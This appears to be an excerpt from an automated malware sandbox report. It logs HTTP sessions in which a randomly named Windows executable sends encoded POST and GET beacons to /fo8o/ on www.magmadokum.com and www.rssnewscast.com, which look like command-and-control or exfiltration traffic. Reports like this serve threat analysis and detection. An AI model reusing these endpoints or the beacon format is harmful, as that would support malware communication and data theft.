User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Nov 22, 2024 07:50:03.298827887 CET | 492 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Fri, 22 Nov 2024 06:50:02 GMT
Connection: close
Content-Length: 315
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49788 | 85.159.66.93 | 80 | 5436 | C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 07:50:17.642718077 CET | 776 | OUT | POST /fo8o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Host: www.magmadokum.com
Origin: http://www.magmadokum.com
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 202
Referer: http://www.magmadokum.com/fo8o/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Ascii: Ml18S=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R0k7EarVbESuuRBg+bvxZ85DDaySAHXLgsw==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49794 | 85.159.66.93 | 80 | 5436 | C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 07:50:20.360714912 CET | 796 | OUT | POST /fo8o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Host: www.magmadokum.com
Origin: http://www.magmadokum.com
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 222
Referer: http://www.magmadokum.com/fo8o/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Ascii: Ml18S=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5nwH1b0KU2p314UqTsJyG6NhniK+ohDMIM=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49800 | 85.159.66.93 | 80 | 5436 | C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 07:50:23.007030010 CET | 10878 | OUT | POST /fo8o/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate, br
Host: www.magmadokum.com
Origin: http://www.magmadokum.com
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 10302
Referer: http://www.magmadokum.com/fo8o/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 4d 6c 31 38 53 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 75 33 54 6d 77 4d 61 71 51 6d 74 4c 43 70 54 55 37 78 4b 47 4b 50 33 48 63 71 76 79 6b 54 69 45 69 48 36 46 44 46 6a 35 4a 63 61 73 72 2b 54 30 59 77 4c 51 2b 36 33 73 63 54 68 32 45 66 54 73 59 6e 4a 78 53 73 4c 30 69 71 70 58 30 78 33 4b 4d 44 5a 75 4f 51 38 58 64 55 44 58 39 61 68 67 42 65 42 73 6a 38 6e 71 74 68 2f 73 6b 63 71 73 4c 75 51 2b 31 6d 4f 73 39 4a 51 4a 4e 66 55 41 36 4d 68 73 32 39 78 6c 73 68 64 74 75 6f 47 7a 73 6d 58 51 75 70 6d 64 53 4f 2f 6f 47 54 33 56 67 64 [TRUNCATED]
                                                                            Data Ascii: Ml18S=… [TRUNCATED]


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            8 | 192.168.2.4 | 49805 | 85.159.66.93 | 80 | 5436 | C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 22, 2024 07:50:25.662738085 CET | 514 | OUT | GET /fo8o/?nVb4=q2L0IduHqXQ8JBmp&Ml18S=qL3nKp+YSjoaTomnOzyxpXPFUBhLgkHGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKFgJSPFkq5dbaCOx4WcoETVBbNsEZyvIPzk= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Host: www.magmadokum.com
                                                                            Connection: close
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Nov 22, 2024 07:51:26.986809969 CET | 194 | IN | HTTP/1.0 504 Gateway Time-out
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            9 | 192.168.2.4 | 49956 | 91.195.240.94 | 80 | 5436 | C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 22, 2024 07:51:32.514878035 CET | 779 | OUT | POST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.rssnewscast.com
                                                                            Origin: http://www.rssnewscast.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 202
                                                                            Referer: http://www.rssnewscast.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 4d 6c 31 38 53 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 70 76 46 46 63 4e 4d 51 30 41 59 42 79 74 58 32 74 6a 4b 75 55 42 44 76 36 51 5a 4a 63 54 72 68 51 67 3d 3d
                                                                            Data Ascii: Ml18S=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8pvFFcNMQ0AYBytX2tjKuUBDv6QZJcTrhQg==
                                                                            Nov 22, 2024 07:51:33.838655949 CET | 707 | IN | HTTP/1.1 405 Not Allowed
                                                                            date: Fri, 22 Nov 2024 06:51:33 GMT
                                                                            content-type: text/html
                                                                            content-length: 556
                                                                            server: Parking/1.0
                                                                            connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            10 | 192.168.2.4 | 49962 | 91.195.240.94 | 80 | 5436 | C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 22, 2024 07:51:35.161812067 CET | 799 | OUT | POST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.rssnewscast.com
                                                                            Origin: http://www.rssnewscast.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 222
                                                                            Referer: http://www.rssnewscast.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 4d 6c 31 38 53 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 67 51 38 74 69 48 61 42 42 6c 4c 4c 58 79 79 50 68 6e 4a 6e 52 69 69 39 2f 7a 66 57 66 67 30 61 4e 76 71 77 6a 4c 6d 65 78 48 2b 70 30 7a 34 48 36 49 55 46 71 59 38 42 31 44 57 54 6c 6c 41 6c 58 30 4c 33 49 66 70 41 73 4b 33 56 6c 4b 63 58 39 55 45 2b 4d 67 55 6c 30 47 53 6f 6f 7a 54 48 33 54 5a 33 30 6c 32 4b 53 4b 74 45 45 6e 37 4b 4c 50 73 35 69 53 67 64 78 49 55 4d 4d 45 38 67 59 42 33 72 47 73 38 53 72 35 47 42 6e 63 6e 58 51 39 52 51 57 6f 4c 68 64 68 6d 61 57 52 71 4e 62 73 30 53 75 50 4c 32 79 62 34 51 38 3d
                                                                            Data Ascii: Ml18S=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBncnXQ9RQWoLhdhmaWRqNbs0SuPL2yb4Q8=
                                                                            Nov 22, 2024 07:51:36.532432079 CET | 707 | IN | HTTP/1.1 405 Not Allowed
                                                                            date: Fri, 22 Nov 2024 06:51:36 GMT
                                                                            content-type: text/html
                                                                            content-length: 556
                                                                            server: Parking/1.0
                                                                            connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            11 | 192.168.2.4 | 49968 | 91.195.240.94 | 80 | 5436 | C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 22, 2024 07:51:37.822875977 CET | 10881 | OUT | POST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.rssnewscast.com
                                                                            Origin: http://www.rssnewscast.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 10302
                                                                            Referer: http://www.rssnewscast.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 4d 6c 31 38 53 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 6f 51 38 34 2b 48 61 69 70 6c 4d 4c 58 79 74 2f 68 6d 4a 6e 52 46 69 39 48 2f 66 57 43 56 30 66 4a 76 73 52 44 4c 78 36 6c 48 31 70 30 7a 6c 58 36 4e 4d 6c 71 33 38 42 45 49 57 58 46 6c 41 6c 58 30 4c 32 34 66 73 68 73 4b 78 56 6c 4a 66 58 39 41 41 2b 4d 49 55 68 5a 39 53 6f 39 49 54 7a 44 54 61 58 6b 6c 31 34 71 4b 76 6b 45 6c 34 4b 4c 48 73 35 75 52 67 64 73 35 55 4d 34 75 38 69 45 42 31 63 4c 75 6d 78 6a 67 59 41 33 54 30 33 6f 6d 56 6a 6d 6f 4b 79 67 5a 33 61 75 4a 31 66 71 45 79 69 50 6e 5a 53 4f 6d 6d 77 4e 56 51 65 68 4f 31 37 46 72 4f 37 79 4c 69 6c 5a 7a 4c 42 67 59 42 57 70 6b 47 69 6b 79 6e 4c 70 48 68 2f 7a 38 56 70 48 30 31 5a 43 30 31 41 4f 61 46 67 41 43 78 48 4b 39 42 72 38 6c 68 59 4a 54 48 2b 63 51 75 54 50 63 73 77 44 4f 61 77 57 72 65 57 4c 5a 52 4f 62 34 4f 51 4b 44 67 58 4f 70 41 7a 79 72 4d 76 4e 36 69 72 51 71 46 6a 42 68 48 72 55 64 [TRUNCATED]
                                                                            Data Ascii: Ml18S=… [TRUNCATED]
                                                                            Nov 22, 2024 07:51:39.455666065 CET | 707 | IN | HTTP/1.1 405 Not Allowed
                                                                            date: Fri, 22 Nov 2024 06:51:38 GMT
                                                                            content-type: text/html
                                                                            content-length: 556
                                                                            server: Parking/1.0
                                                                            connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            12 | 192.168.2.4 | 49974 | 91.195.240.94 | 80 | 5436 | C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 22, 2024 07:51:40.490550041 CET | 515 | OUT | GET /fo8o/?Ml18S=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&nVb4=q2L0IduHqXQ8JBmp HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Host: www.rssnewscast.com
                                                                            Connection: close
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Nov 22, 2024 07:51:42.053124905 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                            date: Fri, 22 Nov 2024 06:51:41 GMT
                                                                            content-type: text/html; charset=UTF-8
                                                                            transfer-encoding: chunked
                                                                            vary: Accept-Encoding
                                                                            expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                            cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                            pragma: no-cache
                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_unjBeewMUsBbtVhF2Zbre5aID80PATlFhdTM6YeSrrq3WEeZ8enPVW5cNWN0XiARcuWRCR1/A4+7uDEeA1prHw==
                                                                            last-modified: Fri, 22 Nov 2024 06:51:41 GMT
                                                                            x-cache-miss-from: parking-7ffff5845f-6gjhm
                                                                            server: Parking/1.0
                                                                            connection: close
                                                                            Data Raw: 32 45 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 75 6e 6a 42 65 65 77 4d 55 73 42 62 74 56 68 46 32 5a 62 72 65 35 61 49 44 38 30 50 41 54 6c 46 68 64 54 4d 36 59 65 53 72 72 71 33 57 45 65 5a 38 65 6e 50 56 57 35 63 4e 57 4e 30 58 69 41 52 63 75 57 52 43 52 31 2f 41 34 2b 37 75 44 45 65 41 31 70 72 48 77 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 6e [TRUNCATED]
                                                                            Data Ascii: 2E2<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_unjBeewMUsBbtVhF2Zbre5aID80PATlFhdTM6YeSrrq3WEeZ8enPVW5cNWN0XiARcuWRCR1/A4+7uDEeA1prHw==><head><meta charset="utf-8"><title>rssnewscast.com&nbsp;-&nbsp;rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the informati
                                                                            Nov 22, 2024 07:51:42.053143024 CET | 1236 | IN | Data Raw: 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66
                                                                            Data Ascii: on you’re looking for. From general topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are searchAECing for!"><link rel="icon" type="image/png" href="//img.
                                                                            Nov 22, 2024 07:51:42.053155899 CET | 1236 | IN | Data Raw: 6e 65 2d 68 65 69 67 68 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 30 2e 32 35 65 6d 7d 73 75 70 7b 74 6f 70 3a 2d
                                                                            Data Ascii: ne-height:0;position:relative;vertical-align:baseline}sub{bottom:-0.25em}sup{top:-0.5em}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,sel
